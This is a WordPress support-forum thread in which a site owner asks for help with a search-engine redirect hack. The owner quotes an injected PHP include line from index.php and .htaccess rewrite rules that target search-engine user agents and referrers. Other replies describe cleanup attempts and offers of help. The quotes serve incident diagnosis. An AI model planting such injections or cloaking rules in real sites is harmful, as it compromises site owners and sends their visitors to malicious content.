• Hello! I’m aware that a few posts on this matter exist already however i’m hoping for some additional clarity. A number of wordpress sites I have created are currently being redirected to a porn site when accessed through a search engine (google, bing, yahoo). Accessing the website via the domain is OK.

    Having read up on this issues, I’ve investigated my code and .htaccess file. I have noticed that in the index.php file the following code is displayed –

    error_reporting(0);ini_set("display_errors", 0);include_once(sys_get_temp_dir()."/SESS_48cd7517d21176f980daa5502d9efb31"); ?><?php

    When this line of code is removed, the website acts fine in google and the redirection hack doesn’t appear for a number of hours. It does however re-appear later each day and the index.php file has again been modified.

    The .htaccess file has the following code listed;

    <IfModule mod_rewrite.c>
    RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
    RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
    RewriteRule ^.*$ index.php [L]
    </IfModule>

    I have changed my FTP passwords, contacted my host, changed my wordpress username via myPHPadmin…

    Any help would be appreciated.

Viewing 5 replies - 1 through 5 (of 5 total)
  • Hi,

    I’ve been helping a friend with EXACTLY the same problem. I’ve been through his files moving and deleting suspicious files.

    I’ve recently installed the sucuri plugin (https://br.www.ads-software.com/plugins/sucuri-scanner/) and I’ve been checking its dashboard regularly (deleting the files that should not exist and restoring the ones that are hacked). After the last sweep I thought we were in the clear, but today more hacked files appeared.

    We have an open ticket with his hosting provider. If I discover anything I’ll come here to share with you. Hope you do the same.

    Regards!

    Thread Starter chr15hoop3r

    (@chr15hoop3r)

    Thanks ederribeiro.

    I have the same issue even after deleting every file of WordPress. Are you working with Dreamhost?

    Moderator Ipstenu (Mika Epstein)

    (@ipstenu)

    ?????? Advisor and Activist

    @asalinasci – I work for DreamHost. If you want to tell me your domain, I can have a look. If you don’t want it to be public, you can email me at mika.epstein @ dreamhost.com

    Hi,

    Exactly the same issues with my GoDaddy. I’ve been dealing with this for over a month already but if I come across the perfect fix I will share it here.

    Thanks!

Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘Redirection Hack’ is closed to new replies.